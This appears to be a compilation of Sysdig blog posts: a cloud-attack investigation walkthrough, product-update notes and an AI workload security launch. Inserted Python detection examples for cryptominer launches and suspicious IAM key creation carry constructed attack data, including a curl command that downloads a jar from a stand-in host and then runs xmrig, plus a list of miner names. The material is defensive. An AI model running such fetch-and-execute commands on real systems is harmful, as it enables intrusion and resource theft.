Figure: Interact with predefined filters

In this scenario, we filter events where Sysdig has detected a Netcat execution on your cloud workload. Netcat is a common tool used by adversaries to assist in illegal activities, and is flagged and quarantined by many antivirus applications. Let’s dive in and review the factors that triggered the above Sysdig rule, including the captured command line, process tree, user and cloud details, vulnerabilities, and the rule tags.

Figure: Filtered view of Netcat events
Figure: Factors that triggered the Sysdig rule on the workload

Sysdig provides you enough context to collaborate with diverse personas, such as vulnerability management, developers, security architects, infrastructure, and more, so you can engage with and address any security gaps with clinical precision.

By now, your curiosity has likely been piqued enough to want to uncover the relationships between the impacted resources and the contributing events. 

Figure: Attack chain visualization

Our attack chain visualization provides a single graphical overview of the adversary’s tactics, techniques, and procedures. It consolidates data from multiple sources — including posture misconfigurations, existing vulnerabilities, launched processes, and activity audits — to evaluate the impact of the ongoing threat.

Sysdig correlates events and enriches them with deep runtime insights, enabling analysts to rapidly investigate and pivot across any resource, event, or attribute. Our platform helps trace adversary movements across your cloud environment, and potentially prevent them from further compromising your network.

At a glance, you will gain critical understanding of an event’s context, such as: 

  • What was the root cause of the event?
  • What other systems has the threat actor accessed that may be at risk?
  • What processes and commands were run on the impacted workloads?
  • What vulnerabilities or misconfigured permissions are in use?
  • What permissions and identities were elevated?

The runtime detections (seen to the left) depict a timeline of activities within the specified cluster. They are color-coded to indicate severities.

The graph also enables you to directly interact with the impacted assets. For example, in our demo, the workload legacy-webapp is the impacted resource. If we were to click on it, a list of interactive options enable you to navigate and review the specific factors that led to this high-severity event.

Figure: Interactive features of the attack chain
Figure: Workload details

A drawer opens up to the right that provides under-the-hood configuration details of the workload, including the image, cluster name, namespace, and zones. It also collects data across the posture misconfigurations, in-use exploits, activity audit, and launched processes. For example, if you were to navigate to the Posture tab, you’ll observe all the posture findings on the workload (agentless approach), and the reasons why certain controls failed on the impacted workload. 

This level of context and guided remediation helps eliminate friction points, and enables your security teams to make split-second decisions at crunch time.

Figure: Posture misconfigurations on the workload

Now that we are comfortable handling the UI, let’s pivot to Processes, where all the executed commands on the workload are logged at runtime. This helps you to understand whether this was a lone event or part of a bigger threat activity.

Figure: Executed processes on the workload

From this view, you can see that the user (assuming root privileges) downloaded a few Java files on the workload. You have intel by now from the Vulnerabilities tab that your legacy-webapp has a Spring4Shell Java vulnerability (read here for more context). 

Jump in to review the Process Tree for the curl command and trace the adversary movement within your cloud estate.

Figure: Process tree highlights executed cryptominer

The process tree traces out the timeline of executed command lines captured by the agent at runtime. It illustrates the kill chain from user to process, including process lineage, container and host information, malicious user details, and impact. Almost immediately, you’ll see xmrig, a cryptominer delivered as a trojan that masquerades as a legitimate program but conceals malicious or unwanted functionality. This xmrig was executed a few seconds after the Java files were downloaded on the workload. This is evidence enough that the workload is infected, and you need to respond promptly to contain the attack. 
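The download-then-miner pattern the process tree shows can also be expressed as detection logic over process events. The following is an added example, not Sysdig's code: it groups constructed process-spawn records by container, flags any known miner name launched within a window after curl/wget, and walks the ppid chain to reconstruct the lineage; the event fields, the miner name list, the window and the sample records are all assumptions made for this demo.

```python
"""Added example, not Sysdig's code: correlate a file download followed by a
cryptominer launch in the same container, and reconstruct the process lineage.
All event records below are constructed for the demo."""
from dataclasses import dataclass, field
from datetime import datetime, timedelta
from typing import Dict, List

DOWNLOADERS = {"curl", "wget"}
# Process names commonly seen for cryptominers (constructed, non-exhaustive list).
MINER_NAMES = {"xmrig", "minerd", "kdevtmpfsi"}
# MITRE ATT&CK techniques for the two halves of the pattern.
TECHNIQUES = {"download": "T1105 Ingress Tool Transfer",
              "miner": "T1496 Resource Hijacking"}


@dataclass
class ProcEvent:
    ts: datetime          # time the process was spawned
    container: str        # container (workload) name
    pid: int
    ppid: int
    comm: str             # executable name
    cmdline: str
    user: str


@dataclass
class Finding:
    container: str
    download: ProcEvent
    miner: ProcEvent
    lineage: List[str]    # parent chain ending at the miner, e.g. bash > java > sh > xmrig
    delay_s: float        # seconds between the download and the miner launch
    techniques: List[str] = field(default_factory=lambda: list(TECHNIQUES.values()))


def lineage(ev: ProcEvent, by_pid: Dict[int, ProcEvent]) -> List[str]:
    """Walk ppid links back to the root process known in this container."""
    chain, seen = [ev.comm], {ev.pid}
    parent = by_pid.get(ev.ppid)
    while parent is not None and parent.pid not in seen:
        chain.append(parent.comm)
        seen.add(parent.pid)
        parent = by_pid.get(parent.ppid)
    return list(reversed(chain))


def find_download_then_miner(events: List[ProcEvent],
                             window: timedelta = timedelta(seconds=60)) -> List[Finding]:
    """Flag every miner launch preceded by curl/wget in the same container within `window`."""
    by_container: Dict[str, List[ProcEvent]] = {}
    for ev in sorted(events, key=lambda e: e.ts):
        by_container.setdefault(ev.container, []).append(ev)

    findings: List[Finding] = []
    for container, evs in by_container.items():
        by_pid = {e.pid: e for e in evs}
        downloads = [e for e in evs if e.comm in DOWNLOADERS]
        for miner in (e for e in evs if e.comm in MINER_NAMES):
            prior = [d for d in downloads if d.ts <= miner.ts <= d.ts + window]
            if prior:  # attribute the miner to the most recent qualifying download
                d = prior[-1]
                findings.append(Finding(container, d, miner, lineage(miner, by_pid),
                                        (miner.ts - d.ts).total_seconds()))
    return findings


# Constructed sample: the legacy-webapp timeline from the post, plus a benign container.
T0 = datetime(2024, 6, 17, 10, 0, 0)
SAMPLE_EVENTS = [
    ProcEvent(T0, "legacy-webapp", 100, 1, "bash", "bash -i", "root"),
    ProcEvent(T0 + timedelta(seconds=5), "legacy-webapp", 101, 100, "curl",
              "curl -o /tmp/app.jar http://203.0.113.10/app.jar", "root"),
    ProcEvent(T0 + timedelta(seconds=8), "legacy-webapp", 102, 100, "java",
              "java -jar /tmp/app.jar", "root"),
    ProcEvent(T0 + timedelta(seconds=15), "legacy-webapp", 103, 102, "sh", "sh -c ./run", "root"),
    ProcEvent(T0 + timedelta(seconds=17), "legacy-webapp", 104, 103, "xmrig",
              "xmrig --config /tmp/config.json", "root"),
    # Benign: a health check in another container that spawns no miner.
    ProcEvent(T0 + timedelta(seconds=3), "frontend", 200, 1, "curl",
              "curl -fsS http://localhost:8080/healthz", "app"),
]

if __name__ == "__main__":
    for f in find_download_then_miner(SAMPLE_EVENTS):
        print(f"[{f.container}] {' > '.join(f.lineage)} started {f.delay_s:.0f}s after "
              f"'{f.download.cmdline}' as {f.miner.user}; {', '.join(f.techniques)}")
```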

Now that you have an idea of the what and the why, let’s dig deeper to uncover the who behind these events. The Identity view expands your investigation to discover whether our adversary compromised any legitimate user accounts to execute their objectives.

Figure: Discover real-time correlated identities
Figure: Investigate compromised user accounts

Here, the user interface displays the impacted user accounts, correlated at runtime with the high-severity events observed at the start of our investigation. The adjacent world map illustrates the captured regions where these accounts may have launched the SCARLETEEL attack. Since time is of the essence here, let’s narrow our investigation window to an hour to confirm the threat actor lurking in your network.

Almost immediately, Sysdig surfaces an EC2 role and a user account, Admin6, within this time window. It also brings forth the relevant events associated with these identities on the left. 

Figure: Possibly compromised EC2 role and user account Admin6 

The events shown indicate multiple reconnaissance activities within your cloud environment. Unless there’s a scheduled maintenance activity, you usually shouldn’t see these discovery events across your cloud accounts.

After further investigation, the data reveals that the adversary assumed the EC2 role to create access keys for a user account, Admin6, within your environment.

Figure: Events reveal access keys created for user account Admin6

Admin6 does not conform to normal naming standards, and the data indicates that this particular account has elevated privileges and several unused permissions. 

Our hypothesis is now confirmed, and we know for certain that this user account has been taken over by the adversary. You can now take quick corrective steps and optimize your IAM policies to prevent further adversary movement. 
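The two signals that confirmed the hypothesis above (an access key created through an assumed EC2 role, and a target user name that breaks the naming convention) can be checked directly against CloudTrail records. The following is an added example, not Sysdig's code: it uses the standard CloudTrail field layout (eventName, userIdentity, sessionContext, requestParameters), while the naming-convention regex, the role and account names, and the sample records are constructed for this demo.

```python
"""Added example, not Sysdig's code: flag CreateAccessKey calls made through an
assumed role, or for a user whose name breaks the naming convention, as in the
Admin6 events above. The regex and the sample records are constructed."""
import re
from typing import Dict, List, Optional

# Assumed convention for human IAM users: lowercase first.last (an assumption for this demo).
USER_NAME_CONVENTION = re.compile(r"^[a-z]+\.[a-z]+$")


def describe_caller(identity: Dict) -> str:
    """Summarise the calling principal from the CloudTrail userIdentity block."""
    if identity.get("type") == "AssumedRole":
        ctx = identity.get("sessionContext", {})
        role = ctx.get("sessionIssuer", {}).get("userName", "?")
        suffix = " via EC2 instance credentials" if "ec2RoleDelivery" in ctx else ""
        return f"role {role}{suffix}"
    return f"{identity.get('type', '?')} {identity.get('userName', '?')}"


def check_create_access_key(records: List[Dict]) -> List[Dict]:
    """Return one finding per suspicious CreateAccessKey record."""
    findings = []
    for rec in records:
        if rec.get("eventSource") != "iam.amazonaws.com" or rec.get("eventName") != "CreateAccessKey":
            continue
        identity = rec.get("userIdentity", {})
        # CloudTrail omits requestParameters.userName when a user creates a key for themself.
        target: Optional[str] = ((rec.get("requestParameters") or {}).get("userName")
                                 or identity.get("userName"))
        reasons = []
        if identity.get("type") == "AssumedRole":
            reasons.append("key created through an assumed role rather than by the user")
            if "ec2RoleDelivery" in identity.get("sessionContext", {}):
                reasons.append("role session originated from EC2 instance credentials")
        if target and not USER_NAME_CONVENTION.match(target):
            reasons.append(f"target user '{target}' does not follow the naming convention")
        if reasons:
            findings.append({
                "time": rec.get("eventTime"),
                "caller": describe_caller(identity),
                "target": target,
                "source_ip": rec.get("sourceIPAddress"),
                "reasons": reasons,
            })
    return findings


# Constructed sample records (not real CloudTrail output).
SAMPLE_RECORDS = [
    {   # the post's scenario: the workload's EC2 role creates a key for Admin6
        "eventTime": "2024-06-17T10:02:41Z",
        "eventSource": "iam.amazonaws.com",
        "eventName": "CreateAccessKey",
        "sourceIPAddress": "203.0.113.10",
        "userIdentity": {
            "type": "AssumedRole",
            "arn": "arn:aws:sts::111122223333:assumed-role/legacy-webapp-ec2-role/i-0abc123",
            "sessionContext": {
                "sessionIssuer": {"type": "Role", "userName": "legacy-webapp-ec2-role"},
                "ec2RoleDelivery": "2.0",
            },
        },
        "requestParameters": {"userName": "Admin6"},
    },
    {   # routine: a human user rotates their own key
        "eventTime": "2024-06-17T09:15:02Z",
        "eventSource": "iam.amazonaws.com",
        "eventName": "CreateAccessKey",
        "sourceIPAddress": "198.51.100.7",
        "userIdentity": {"type": "IAMUser", "userName": "alice.smith",
                         "arn": "arn:aws:iam::111122223333:user/alice.smith"},
        "requestParameters": None,
    },
    {   # a discovery call, out of scope for this particular check
        "eventTime": "2024-06-17T10:01:55Z",
        "eventSource": "ec2.amazonaws.com",
        "eventName": "DescribeInstances",
        "sourceIPAddress": "203.0.113.10",
        "userIdentity": {"type": "AssumedRole"},
    },
]

if __name__ == "__main__":
    for f in check_create_access_key(SAMPLE_RECORDS):
        print(f"{f['time']} {f['caller']} -> {f['target']} from {f['source_ip']}: "
              + "; ".join(f["reasons"]))
```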

Figure: Possibly compromised account Admin6

Expand the time window to review all the interactive commands, established connections, file activities, and executable requests related to Admin6.

Figure: Admin6 has been up to no good

Sysdig’s deep runtime insights, coupled with automatic cross-cloud context and correlation, enable security and development teams to understand the who, what, where, when, and why of the cloud investigation in just 5 minutes. 

This feature is purpose-built to alleviate your investigation pain points, and sets you up to achieve the 555 Benchmark faster than with any traditional detection and response tools.

Join our upcoming deminar 5-Minute Cloud Security Investigations in Action, a technical demonstration of how Sysdig accelerates cloud-native investigation.

  1. Forrester, The Comprehensive Guide To Cloud Detection and Response; Allie Mellen, Andras Cser, Jeff Pollard; April 23, 2024.

What’s New in Sysdig – May 2024 https://sysdig.com/blog/whats-new-in-sysdig-may-2024/ Thu, 30 May 2024 18:00:00 +0000 https://sysdig.com/?p=89787 “What’s New in Sysdig” is back with the May 2024 edition! My name is Dustin Krysak. I’m a Customer Solutions...

The post What’s New in Sysdig – May 2024 appeared first on Sysdig.

“What’s New in Sysdig” is back with the May 2024 edition! My name is Dustin Krysak. I’m a Customer Solutions Engineer based in Vancouver, BC, and I’m excited to share our latest updates.

The Sysdig Threat Research Team (TRT) has been busy recently investigating and analyzing new security threats. Their research has uncovered notable vulnerabilities and attack vectors, which they’ve shared insights about through the Sysdig blog. These blog posts include an in-depth look at RUBYCARP, a long-running botnet, and LLMjacking, a technique that can leverage large language models for malicious purposes.

This month, we also announced our latest initiative, the Runtime Insights Partner Ecosystem. If interested, you can check out our blog post and the official press release.

Sysdig Secure

RBAC Permissions Available in Vulnerability Management

Administrators can now create RBAC roles and define which roles can access the Vulnerability Management, Policy, Reporting, and Risk Acceptance functions. For more information, see Custom Roles.

New Version Releases

Stay up-to-date with the latest releases for our scanning tools. May’s updates bring improved functionality, bug fixes, and security enhancements. 

Sysdig CLI Scanner V1.10.0

Runtime Scanner V1.7.0

Host Scanner V0.10.0

Upgrading is easy, but feel free to reach out if you have any questions.

Sysdig Monitor

Alert Editor

When creating alerts, the Alert Editor automatically displays the optimal time window for your alert rule, and every data point in the alert preview now corresponds with an evaluation of an alert rule. You can also Explore Historical Data for Metric alerts.

Sysdig Agents

13.20.0: Enhanced coverage and visibility

Our latest agent update adds support for SUSE Linux and increased visibility into JMX and non-interactive commands.

SUSE Linux Enterprise Server Support

You can now install the Sysdig Agent on SLES 12 and SLES 15.

Capture Non-Interactive Commands in Activity Audit

Activity audit can now capture and report non-interactive commands.

Support for Adding Labels to JMX Metrics

Sysdig added support for labels on JMX metrics collected by the agent. For more information, see Collect JMX Labels.

Defect Fixes

We have several fixes for our agent that landed in May. The complete list can be seen in the release notes.

SDK, CLI, and Tools

Terraform Provider V1.26.0

  • Adds the ability to create, update, and delete posture policies.

For more information, see our Terraform Provider docs.

Sysdig Cloud Connector V0.16.66

  • Makes secure_api_token optional in cluster-shield

Admission Controller v3.9.45

This release is available under helm chart 0.16.2.

  • Makes secure_api_token optional in cluster-shield

Sysdig Secure Jenkins Plugin v2.3.1 

  • Bump embedded scanner to 1.9.2
  • Bug fixes:
    • Ensure that all the logs from the embedded scanner have been written to file for proper retrieval by the trailer
    • Increase the waiting time before stopping the logs trailer to 2s
    • Ensure proper management of vuln-list inside result json
    • Use imageTag (if available) when all policy evaluations pass

Prometheus Integration v1.29.0

  • APPLY changes over PromQL labels on cluster status dashboards
  • ADD restarted pods toplist panel to cluster status dashboard
  • New version mysql-exporter fixing HIGH vulnerabilities
  • New version php-fpm_exporter fixing HIGH vulnerabilities

Open Source

Falco

Falco 0.37.1 is the latest stable release.

Sysdig Training

Kraken Discovery Labs

Attacks no longer take days—they take minutes. Cloud security requires a modern detection and response benchmark. The 555 benchmark specifies that you have 5 seconds to detect, 5 minutes to triage, and 5 minutes to respond.

In this 60-minute workshop, you’ll execute actual cloud attacks like SCARLETEEL and then assume the role of the defender, leveraging threat-hunting strategies to detect and respond immediately in the cloud.

You can sign up for this lab on our website.

Instructor Led Training

We have a new Azure-specific Cloud Security Posture Management (CSPM) lab available for ILT (Instructor Led Training) delivery. This ILT content includes the concepts of zones and Infrastructure as Code, integrated with source control using GitHub or GitLab.

If you are interested in learning more about how to schedule an ILT workshop, please contact your account team.

Accelerating AI Adoption: AI Workload Security for CNAPP https://sysdig.com/blog/ai-workload-security-for-cnapp/ Tue, 30 Apr 2024 13:45:00 +0000 https://sysdig.com/?p=88105 When it comes to securing applications in the cloud, adaptation is not just a strategy but a necessity. We’re currently...

The post Accelerating AI Adoption: AI Workload Security for CNAPP appeared first on Sysdig.

When it comes to securing applications in the cloud, adaptation is not just a strategy but a necessity. We’re currently experiencing a monumental shift driven by the mass adoption of AI, fundamentally changing the way companies operate. From optimizing efficiency through automation to transforming the customer experience with speed and personalization, AI has empowered developers with exciting new capabilities. While the benefits of AI are undeniable, it is still an emerging technology that poses inherent risks for organizations trying to understand this changing landscape. That’s where Sysdig comes in to secure your organization’s AI development and keep the focus on innovation.

Today, we are thrilled to announce the launch of AI Workload Security to identify and manage active risk associated with AI environments. This new addition to our cloud-native application protection platform (CNAPP) will help security teams see and understand their AI environments, identify suspicious activity on workloads that contain AI packages, and prioritize and fix issues fast.

Skip ahead to the launch details!

AI has changed the game

The explosive growth of AI in the last year has reshaped the way many organizations build applications. AI has quickly become a mainstream topic across all industries and a focus for executives and boards. Advances in the technology have led to significant investment in AI, with more than two-thirds of organizations expected to increase their AI investment over the next three years across all industries. GenAI specifically has been a major catalyst of this trend, driving much of this interest. The Cloud Security Alliance’s recent State of AI and Security Survey Report found that 55% of organizations are planning to implement GenAI solutions this year. Sysdig’s research also found that since December 2023, the deployment of OpenAI packages has nearly tripled.

With more companies deploying GenAI workloads, Kubernetes has become the deployment platform of choice for AI. Large language models (LLMs) are a core component of many GenAI applications that can analyze and generate content by learning from large amounts of text data. Kubernetes has numerous characteristics that make it an ideal platform for LLMs, providing advantages in scalability, flexibility, portability, and more. LLMs require significant resources to run, and Kubernetes can automatically scale resources up and down, while also making it simple to export LLMs as container workloads across various environments. The flexibility when deploying GenAI workloads is unmatched, and top companies like OpenAI, Cohere, and others have adopted Kubernetes for their LLMs. 

From opportunity to risk: security implications of AI

AI continues to advance rapidly, but the widespread adoption of AI deployment creates a whole new set of security risks. The Cloud Security Alliance survey found that 31% of security professionals believe AI will be of equal benefit to security teams and malicious third parties, with another 25% believing it will be more beneficial to malicious parties. Sysdig’s research also found that 34% of all currently deployed GenAI workloads are publicly exposed, meaning they are accessible from the internet or another untrusted network without appropriate security measures in place. This increases the risk of security breaches and puts the sensitive data leveraged by GenAI models in danger.


Another development that highlights the importance of AI security in the cloud is the set of forthcoming guidelines and increasing pressure to audit and regulate AI, as proposed by the Biden administration’s October 2023 Executive Order and the subsequent recommendations from the National Telecommunications and Information Administration (NTIA) in March 2024. The European Parliament also adopted the AI Act in March 2024, introducing stringent requirements on risk management, transparency, and other issues. Ahead of this imminent AI legislation, organizations should assess their own ability to secure and monitor AI in their environments.

Many organizations lack experience securing AI workloads and identifying risks associated with AI environments. Just like the rest of an organization’s cloud environment, it is critical to prioritize active risks tied to AI workloads, such as vulnerabilities in in-use AI packages or malicious actors trying to modify AI requests and responses. Without full understanding and visibility of AI risk, it’s possible for AI to do more harm than good.

Mitigate active AI risk with AI Workload Security

We’re excited to unveil AI Workload Security in Sysdig’s CNAPP to help our customers adopt AI securely. AI Workload Security allows security teams to identify and prioritize workloads in their environment with leading AI engines and software packages, such as OpenAI and TensorFlow, and detect suspicious activity within these workloads. With these new capabilities, your organization can get real-time visibility of the top active AI risks, enabling your teams to address them immediately. Sysdig helps organizations manage and control their AI usage, whether it’s official or deployed without proper approval, so they can focus on accelerating innovation.

Sysdig’s AI Workload Security ties into our Cloud Attack Graph, the neural center of the Sysdig platform, integrating with our Risk Prioritization, Attack Path Analysis, and Inventory features to provide a single view of correlated risks and events.

AI Workload Security in action

The introduction of real-time AI Workload Security helps companies prioritize the most critical risks associated with AI environments. Sysdig’s Risks page provides a stack-ranked view of risks, evaluating which combinations of findings and context need to be addressed immediately across your cloud environment. Publicly exposed AI packages are highlighted along with other risk factors. In the example below, we see a critical risk with the following findings:

  1. Publicly exposed workload
  2. Contains an AI package
  3. Has critical vulnerability with an exploit running on an in-use package
  4. Contains a high confidence event

Based on the combination of findings, users can determine the severity of the risk that exposed AI workloads create. They can also gather more context around the risk, including which packages on the workload are running AI and whether vulnerabilities on these packages can be fixed with a patch.

AI workload risks

Digging deeper into these risks, users can also get a more visual representation of the exploitable links across resources with Attack Path Analysis. Sysdig uncovers potential attack paths involving workloads with AI packages, showing how they fit with other risk factors like vulnerabilities, misconfigurations, and runtime detections on these workloads. Users can see which AI packages running on the workload are in use and how vulnerable packages can be fixed. With the power of AI Workload Security, users can quickly identify critical attack paths involving their AI models and data, and correlate with real-time events.

Sysdig also gives users the ability to identify all of the resources in your cloud environment that have AI packages running. AI Workload Security empowers Sysdig’s Inventory, enabling users to view a full list of resources containing AI packages with a single click, as well as identify risks on these resources.

Want to learn more?

Armed with these new capabilities, you’ll be well equipped to defend against active AI risk, helping your organization realize the full potential of AI’s benefits. These advancements provide an additional layer of security to our top-rated CNAPP solution, stretching our coverage further across the cloud. Click here to learn more about Sysdig’s leading CNAPP.

See Sysdig in action

Sign up for our Kraken Discovery Lab to execute real cloud attacks and then assume the role of the defender to detect, investigate, and respond.

What’s New – March 2024 https://sysdig.com/blog/whats-new-march-2024/ Fri, 29 Mar 2024 18:00:00 +0000 https://sysdig.com/?p=88053 “What’s New in Sysdig” is back with the March 2024 edition! My name is Jonathon Cerda, based in Dallas, Texas,...

The post What’s New – March 2024 appeared first on Sysdig.

“What’s New in Sysdig” is back with the March 2024 edition! My name is Jonathon Cerda, based in Dallas, Texas, and the Sysdig team is excited to share our latest feature releases with you.

March doesn’t just signify the arrival of spring showers and blooming flowers, but also the arrival of Women’s History Month, a time to celebrate and honor the contributions and achievements by women in the United States.

International Women’s Day is also celebrated during March, a day which celebrates the achievements of women from all across the world.

Stay tuned for more updates from Sysdig, and let’s get started!

Sysdig Secure

View Cloud Host Vulnerabilities in Inventory

Inventory now lets you search for vulnerable resources on your AWS and GCP cloud hosts (EC2 Instance, Compute Instance).

Furthermore, each cloud host’s resource-360 drawer includes vulnerability findings through a new tab.
You can also search on Package Name-Version. Note that Azure VM Hosts are out of scope at this time. See Inventory for details.

Inventory UI Updates

You can now search by Host Image ID for AWS EC2 Instance and GCP Compute Instance.

Monitor Objects in S3 Buckets

Agentless AWS Cloud Threat Detection (CDR) coverage is extended to monitor operations performed on objects stored in Simple Storage Service (S3) buckets through S3 notifications.

AWS CloudTrail integration now supports:

  • ReadOnly management events (whose verb starts with Get/List/Describe).
  • Coverage for S3 notifications to monitor S3 buckets and extend our AWS Agentless CDR coverage.

For details, see the AWS Agentless instructions to connect a cloud account.
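To make the distinction between these event classes concrete, here is an added example (not Sysdig code) that triages a handful of CloudTrail records the way an agentless CDR pipeline would after this extension: it separates S3 object-level operations from read-only management calls (using CloudTrail's explicit readOnly flag, with the Get/List/Describe verb-prefix heuristic as a fallback) and from mutating calls. The records, account ID, ARN, IP address, bucket and key names are constructed; the field names are the standard CloudTrail ones.

```python
"""Triage newline-delimited CloudTrail records into the classes a CDR pipeline
treats differently once read-only management events and S3 object operations
are ingested. Added example, not Sysdig code; only standard CloudTrail record
fields are used."""
import json

# Constructed records (not from a real account; account ID, ARN, IP, bucket and
# key are placeholders). The last record deliberately lacks the readOnly flag.
SAMPLE_RECORDS = """
{"eventSource": "s3.amazonaws.com", "eventName": "ListBuckets", "readOnly": true, "eventCategory": "Management", "userIdentity": {"arn": "arn:aws:iam::111122223333:user/ci-deploy"}, "sourceIPAddress": "198.51.100.7"}
{"eventSource": "ec2.amazonaws.com", "eventName": "DescribeInstances", "readOnly": true, "eventCategory": "Management", "userIdentity": {"arn": "arn:aws:iam::111122223333:user/ci-deploy"}, "sourceIPAddress": "198.51.100.7"}
{"eventSource": "s3.amazonaws.com", "eventName": "GetObject", "readOnly": true, "eventCategory": "Data", "requestParameters": {"bucketName": "payroll-exports", "key": "2024/q1.csv"}, "userIdentity": {"arn": "arn:aws:iam::111122223333:user/ci-deploy"}, "sourceIPAddress": "198.51.100.7"}
{"eventSource": "s3.amazonaws.com", "eventName": "PutBucketPolicy", "readOnly": false, "eventCategory": "Management", "requestParameters": {"bucketName": "payroll-exports"}, "userIdentity": {"arn": "arn:aws:iam::111122223333:user/ci-deploy"}, "sourceIPAddress": "198.51.100.7"}
{"eventSource": "s3.amazonaws.com", "eventName": "DeleteObject", "readOnly": false, "eventCategory": "Data", "requestParameters": {"bucketName": "payroll-exports", "key": "2024/q1.csv"}, "userIdentity": {"arn": "arn:aws:iam::111122223333:user/ci-deploy"}, "sourceIPAddress": "198.51.100.7"}
{"eventSource": "sts.amazonaws.com", "eventName": "GetCallerIdentity", "eventCategory": "Management", "userIdentity": {"arn": "arn:aws:iam::111122223333:user/ci-deploy"}, "sourceIPAddress": "198.51.100.7"}
"""

READ_ONLY_VERBS = ("Get", "List", "Describe")
S3_OBJECT_OPS = {"GetObject", "PutObject", "CopyObject", "DeleteObject", "DeleteObjects"}


def is_read_only(record):
    """Prefer CloudTrail's explicit readOnly flag; fall back to the verb-prefix
    heuristic only when the flag is absent."""
    if "readOnly" in record:
        return bool(record["readOnly"])
    return record["eventName"].startswith(READ_ONLY_VERBS)


def classify(record):
    """S3 object operations are tracked separately from management calls, and
    read-only management calls (reconnaissance) from mutating ones."""
    if record["eventSource"] == "s3.amazonaws.com" and record["eventName"] in S3_OBJECT_OPS:
        return "s3-object"
    if is_read_only(record):
        return "read-only-management"
    return "mutation"


def triage(log_text):
    """Parse one JSON record per line and group records by class, keeping the
    fields an analyst pivots on (principal, source IP, bucket, key)."""
    groups = {"s3-object": [], "read-only-management": [], "mutation": []}
    for line in log_text.strip().splitlines():
        record = json.loads(line)
        params = record.get("requestParameters", {})
        entry = {
            "event": record["eventName"],
            "principal": record["userIdentity"]["arn"],
            "source_ip": record.get("sourceIPAddress"),
            "bucket": params.get("bucketName"),
            "key": params.get("key"),
        }
        groups[classify(record)].append(entry)
    return groups


def object_touches(log_text):
    """Answer 'who read, wrote or deleted which object': (principal, bucket, key, event)."""
    return [(e["principal"], e["bucket"], e["key"], e["event"])
            for e in triage(log_text)["s3-object"]]


if __name__ == "__main__":
    for cls, entries in triage(SAMPLE_RECORDS).items():
        print(f"{cls}: {[e['event'] for e in entries]}")
    for touch in object_touches(SAMPLE_RECORDS):
        print("object access:", touch)
```

Two practical caveats: the verb-prefix heuristic is only a fallback, since read-only operations such as HeadBucket do not start with Get/List/Describe, so the explicit readOnly flag should win whenever it is present; and object-level S3 events only reach the pipeline for buckets where S3 notifications (or CloudTrail data events) have been enabled, so an empty "s3-object" group can mean no access or no coverage.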

Risks Module Released in Technical Preview

We are excited to release Risks in Technical Preview. The Risks feature correlates findings from CSPM, KSPM, cloud log ingestion, CIEM, Vulnerability Management, and Agent-Based Threat Detection. By combining the most critical security issues, we prioritize the biggest risks for security teams to focus on.

For details, see Risks.

Kill Process in Workload

In Threat Detection Policies, Workload and List Matching policies can now be configured to kill the event-triggering process. For details, see Workload.

Improved Azure Cloud Account onboarding

Sysdig has launched an improved onboarding experience for Azure Cloud Accounts. Users can specify their installation preferences regarding desired features. Sysdig then guides them through the installation process step-by-step, ensuring a seamless and personalized experience.

In addition, Sysdig’s Agentless CDR now supports threat detection on Azure. By leveraging Falco and its constantly updated rules managed by the Sysdig Threat Research Team, as well as custom rules tailored to specific environments and security requirements, users can connect their Azure accounts effortlessly while benefiting from robust event processing.

For details, see Connect Cloud Account | Azure.

Global Service Accounts

Sysdig has extended the functionality of team-based service accounts with global service accounts. Unlike team-based service accounts, global service accounts can perform actions that require system level permissions. Admins can create a global service account through the API. See Global Service Accounts

CISA KEV

You can now check if a vulnerability, reported by pipeline, registry, or runtime scanning, is registered in the CISA KEV catalog and filter images by CISA KEV. This allows you to view details such as the date added and due date for CISA KEV vulnerabilities. Drill down into scan results to view the CISA KEV information associated with an image. For more information, see Key Vulnerability Management Terminology.
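As an added example (not Sysdig code), the following shows what the KEV check amounts to under the hood: it indexes an excerpt of the CISA catalog in the feed's published JSON schema (cveID, dateAdded, dueDate, knownRansomwareCampaignUse), enriches scan findings with those fields, filters images down to those carrying a KEV entry, and orders findings so that exploited-in-the-wild vulnerabilities with a past due date come first. The two catalog entries, the scan results, image names and package names are constructed for illustration; fetch the live feed from CISA for real data.

```python
"""Enrich vulnerability scan findings with the CISA KEV catalog and order them by
remediation deadline. Added example, not Sysdig code. Uses the field names of
CISA's published known_exploited_vulnerabilities.json feed."""
import json
from datetime import date

# Constructed excerpt in the KEV feed's schema. Only the fields used below are
# kept; for real data fetch
# https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json
KEV_CATALOG_EXCERPT = json.loads("""
{
  "title": "CISA Catalog of Known Exploited Vulnerabilities",
  "vulnerabilities": [
    {"cveID": "CVE-2021-44228", "vendorProject": "Apache", "product": "Log4j2",
     "dateAdded": "2021-12-10", "dueDate": "2021-12-24",
     "knownRansomwareCampaignUse": "Known"},
    {"cveID": "CVE-2023-4911", "vendorProject": "GNU", "product": "glibc",
     "dateAdded": "2023-11-21", "dueDate": "2023-12-12",
     "knownRansomwareCampaignUse": "Unknown"}
  ]
}
""")

# Constructed scan results for two images (image and package names are
# placeholders, not real scanner output).
SCAN_RESULTS = {
    "registry.example/api:1.4.2": [
        {"cve": "CVE-2024-24786", "package": "google.golang.org/protobuf", "severity": "High"},
        {"cve": "CVE-2023-4911", "package": "glibc", "severity": "High"},
        {"cve": "CVE-2021-44228", "package": "log4j-core", "severity": "Critical"},
    ],
    "registry.example/cli:0.9.0": [
        {"cve": "CVE-2024-26147", "package": "helm", "severity": "Medium"},
    ],
}

SEVERITY_RANK = {"Critical": 0, "High": 1, "Medium": 2, "Low": 3, "Negligible": 4}


def index_kev(catalog):
    """Map cveID -> catalog entry for O(1) lookups during enrichment."""
    return {entry["cveID"]: entry for entry in catalog["vulnerabilities"]}


def enrich(findings, kev_index):
    """Attach KEV metadata (date added, due date, ransomware use) to each finding."""
    enriched = []
    for finding in findings:
        entry = kev_index.get(finding["cve"])
        item = dict(finding, in_kev=entry is not None)
        if entry is not None:
            item["kev_date_added"] = date.fromisoformat(entry["dateAdded"])
            item["kev_due_date"] = date.fromisoformat(entry["dueDate"])
            item["kev_ransomware_use"] = entry.get("knownRansomwareCampaignUse", "Unknown")
        enriched.append(item)
    return enriched


def prioritize(findings, kev_index, today=None):
    """Order findings: KEV entries first (overdue before not-yet-due, earliest due
    date first), then everything else by scanner severity. `today` is an ISO
    date string; defaults to the current date."""
    today = date.today() if today is None else date.fromisoformat(today)

    def sort_key(item):
        if item["in_kev"]:
            overdue = item["kev_due_date"] < today
            return (0, 0 if overdue else 1, item["kev_due_date"], SEVERITY_RANK[item["severity"]])
        return (1, 1, date.max, SEVERITY_RANK[item["severity"]])

    return sorted(enrich(findings, kev_index), key=sort_key)


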